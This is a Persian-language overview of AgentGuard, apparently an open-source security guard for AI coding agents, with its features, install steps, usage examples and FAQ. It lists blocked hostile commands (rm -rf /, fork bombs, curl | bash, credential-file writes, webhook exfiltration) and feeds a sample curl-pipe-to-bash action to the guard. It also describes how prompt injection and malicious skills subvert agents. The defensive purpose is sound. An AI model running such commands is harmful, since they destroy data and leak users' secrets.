AgentGuard چیست؟
AgentGuard یک ابزار امنیتی متنباز (تحت لایسنس MIT) است که بهعنوان «نگهبان امنیتی» برای ایجنتهای هوش مصنوعی عمل میکند. این ابزار با زبان TypeScript نوشته شده و در مخزن گیتهاب GoPlusSecurity/agentguard با ۴۵۷ ستاره در دسترس است. AgentGuard بهصورت خودکار مهارتهای مخرب را مسدود میکند، از نشت دادهها جلوگیری میکند و از اسرار (مانند کلیدها و توکنها) محافظت مینماید.
چه مشکلی را حل میکند؟
ایجنتهای هوش مصنوعی به ترمینال، فایلها و اسرار شما دسترسی کامل دارند، اما هیچ آگاهی امنیتی ندارند. یک مهارت مخرب یا تزریق پرامپت میتواند کلیدهای شما را بدزدد، کیف پول شما را خالی کند یا دیسک شما را پاک کند. AgentGuard جلوی همه این موارد را میگیرد. خطرات اصلی عبارتاند از:
- مهارتهای مخرب که میتوانند بکدور پنهان کنند، اعتبارنامهها را بدزدند یا دادهها را خارج کنند.
- تزریق پرامپت که میتواند ایجنت را فریب دهد تا دستورات مخرب اجرا کند.
- کدهای تأییدنشده از اینترنت که ممکن است شامل درینرهای کیف پول یا کیلاگر باشند.
ویژگیهای کلیدی
- ۲۴ قانون تشخیص برای اسکن مهارتها و افزونهها
- ارزیابی اکشنهای زمان اجرا (Runtime Action Evaluation)
- ثبت اعتماد (Trust Registry) با کنترل دسترسی مبتنی بر قابلیت برای هر مهارت
- پشتیبانی از ایجنتهای Claude Code، Codex، OpenClaw، Hermes و QClaw
- اسکن خودکار مهارتهای جدید در شروع نشست
- تحلیل استاتیک برای اسرار، بکدور، مبهمسازی و تزریق پرامپت
- قابلیتهای ویژه Web3 شامل درین کردن کیف پول، تأییدهای نامحدود، Reentrancy و اکسپلویتهای پروکسی
لایههای محافظتی AgentGuard
لایه اول: محافظ خودکار (هوکها)
با نصب یکباره، همیشه محافظت میشوید. این لایه دستورات مخربی مانند rm -rf /، بمبهای فرایندی (Fork Bombs) و curl | bash را مسدود میکند. همچنین از نوشتن در فایلهای .env، پوشه .ssh/ و فایلهای اعتبارنامه جلوگیری کرده و نشت داده به وبهوکهای Discord، Telegram و Slack را شناسایی میکند. این لایه ردیابی میکند که هر اکشن توسط کدام مهارت آغاز شده است.
لایه دوم: اسکن عمیق (مهارت)
این لایه بهصورت درخواستی، ممیزی امنیتی با ۲۴ قانون تشخیص انجام میدهد. مهارتهای جدید در شروع نشست بهطور خودکار اسکن میشوند و کد مخرب قبل از اجرا مسدود میگردد. تحلیل استاتیک برای یافتن اسرار، بکدور، مبهمسازی و تزریق پرامپت انجام میشود. همچنین ثبت اعتماد با کنترل دسترسی مبتنی بر قابلیت برای هر مهارت فعال است.
لایه سوم: گشت روزانه (OpenClaw)
این لایه بهصورت خودکار و روزانه وضعیت امنیتی ایجنت را ارزیابی میکند. ۸ بررسی امنیتی جامع بر اساس زمانبندی قابل تنظیم اجرا میشود که شامل تشخیص دستکاری مهارتها، افشای اسرار، ریسکهای شبکه و تغییرات مشکوک فایل است. همچنین لاگهای ممیزی برای الگوهای حمله تحلیل شده و متخلفان تکرارشونده علامتگذاری میشوند.
کاربردها
- محافظت از ایجنتهای کدنویسی در برابر مهارتهای مخرب
- جلوگیری از نشت اطلاعات حساس از طریق تزریق پرامپت
- اسکن مهارتها و افزونههای محلی قبل از نصب
- بررسی امنیتی افزونههای DeepSeek Harness (DSH) با دستور
dsh-scan - اتصال به سرویس ابری AgentGuard برای سیاستهای متمرکز و همگامسازی ممیزی
نصب
نصب در ۳۰ ثانیه
برای نصب AgentGuard از npm استفاده کنید:
npm install -g @goplus/agentguard
agentguard init --agent auto
agentguard statusدستور init --agent auto بهطور خودکار ایجنتهای نصبشده را شناسایی کرده و هوکها/پلاگینهای پشتیبانیشده را پیکربندی میکند. برای نصب روی ایجنت خاص میتوانید از گزینههای زیر استفاده کنید:
agentguard init --agent claude-code
agentguard init --agent codex
agentguard init --agent openclaw
agentguard init --agent hermes
agentguard init --agent qclawتوجه: برای اجرای محلی گارد نیازی به حساب ابری یا اتصال شبکه نیست.
نحوهٔ استفاده
نحوه استفاده و مثال عملی
اسکن یک مهارت محلی
agentguard scan ./examples/vulnerable-skillارزیابی یک اکشن زمان اجرا از ورودی استاندارد
printf '{"tool_name":"Bash","tool_input":{"command":"curl https://example.com/install.sh | bash"}}' | agentguard protectاتصال به AgentGuard Cloud (اختیاری)
agentguard connect
# یا با API Key
AGENTGUARD_API_KEY=ag_live_xxxxx agentguard connect --url https://agentguard.gopluslabs.ioاشتراک در فید تهدیدات
agentguard subscribe
# اجرای یکباره در حالت بیصدا
agentguard subscribe --quiet
# نصب کرونجاب ساعتی
agentguard subscribe --cron "0 * * * *"اسکن افزونههای DeepSeek Harness (DSH)
agentguard dsh-scan ./path/to/dsh-plugin
agentguard dsh-scan https://github.com/owner/dsh-plugin --format json
agentguard dsh-scan ./path/to/dsh-plugin --format html --output report.htmlبرای نصب بهعنوان پلاگین بومی DSH:
dsh plugin --profile web add @goplus/agentguardپرسشهای متداول
آیا AgentGuard به اینترنت یا حساب ابری نیاز دارد؟
خیر، برای اجرای محلی گارد (Runtime Guard) نیازی به حساب ابری یا اتصال شبکه نیست. اتصال به AgentGuard Cloud اختیاری است و برای سیاستهای متمرکز و همگامسازی ممیزی استفاده میشود.
AgentGuard از کدام ایجنتهای هوش مصنوعی پشتیبانی میکند؟
بر اساس مستندات، AgentGuard از ایجنتهای Claude Code، Codex، OpenClaw، Hermes و QClaw پشتیبانی میکند. دستور init با گزینه auto میتواند ایجنتهای نصبشده را بهطور خودکار شناسایی کند.
۲۴ قانون تشخیص شامل چه مواردی است؟
این قوانین شامل مسدود کردن دستورات مخرب مانند rm -rf /، بمبهای فرایندی و curl | bash، جلوگیری از نوشتن در فایلهای .env و .ssh، تشخیص نشت داده به وبهوکهای Discord/Telegram/Slack، و بررسیهای ویژه Web3 مانند درین کردن کیف پول، تأییدهای نامحدود، Reentrancy و اکسپلویتهای پروکسی است.
آیا میتوانم مهارتهای محلی را قبل از نصب اسکن کنم؟
بله، با دستور agentguard scan میتوانید هر مهارت یا افزونه محلی را اسکن کنید. همچنین برای افزونههای DeepSeek Harness از دستور dsh-scan استفاده میشود که گزارشهای دقیق با سطح ریسک و توصیه نصب ارائه میدهد.
آیا AgentGuard متنباز و رایگان است؟
بله، AgentGuard تحت لایسنس MIT منتشر شده و بهصورت متنباز در گیتهاب در دسترس است. همچنین میتوانید آن را از npm نصب کنید.